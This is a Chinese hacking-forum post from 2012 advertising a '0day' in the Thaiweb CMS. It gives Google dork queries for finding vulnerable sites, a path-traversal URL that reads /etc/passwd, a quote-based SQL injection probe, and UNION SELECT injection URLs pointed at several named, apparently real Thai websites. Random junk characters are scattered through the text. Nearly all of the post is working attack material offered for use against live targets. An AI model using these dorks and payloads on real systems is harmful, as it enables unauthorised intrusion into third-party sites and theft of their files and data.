找回密码
 立即注册
查看: 2449|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:
4 q# \+ n8 R9 u
2 t% o1 u. T7 Z. ]6 v) Sintext:powered by Thaiweb% E3 ~) }1 V2 f* a8 j9 p& r
4 L. T3 I8 u% c8 E. T1 f- ^
inurl:index.php?page=board.php! X4 I' D" w9 L. K6 E7 K

  o9 }/ b% }/ P# R5 \" Z ' b! h' P% \" n

, o7 X2 W' q* I0 z7 }' E# U% m0 _利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd0 \0 J9 M2 {' D8 _4 P0 |

6 B2 ]( a! ]9 }7 [ ; [. U3 I# w4 }& F) N5 G
' F: n7 N9 m2 D4 U' h- c8 w- l
利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
5 a: _  P( \2 |! r
+ s) k. M' M5 l9 j. J1 j* n , w. M: Q7 d+ K, s7 u

* p& s+ ~$ G* Y( ^& T- ohttp://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--/ o# L9 Q% C( v$ r
6 N7 N3 N' j8 W) H' G9 |: J
http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--8 O2 x4 _2 T7 b' ?
( P# b& S2 G: y/ y* H2 ]$ Y
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--5 @+ a, Y! r6 V  U" P, c
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表